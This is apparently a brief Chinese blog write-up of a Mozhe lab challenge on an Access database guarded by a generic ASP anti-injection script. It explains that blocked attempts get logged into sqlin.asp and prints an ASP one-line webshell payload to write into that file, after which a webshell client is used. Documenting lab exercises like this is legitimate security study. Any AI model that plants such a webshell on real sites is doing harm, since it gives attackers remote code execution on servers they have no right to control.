access数据库注入3-墨者靶场access(防注入)

https://www.mozhe.cn/bug/detail/19
一套SQL通用asp防注入脚本

单引号测试:


image.png

很奇怪,+ %0a and or 都会被检测gg。
网上百度得知,access通用防注入系统会把所有记录存到sqlin.asp中,再加上


image.png

这个实训目标,应该是直接将木马写入到asp文件中
asp一句话木马
<%eval request("a")%>
直接上传


image.png

上yijian


image.png
image.png
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。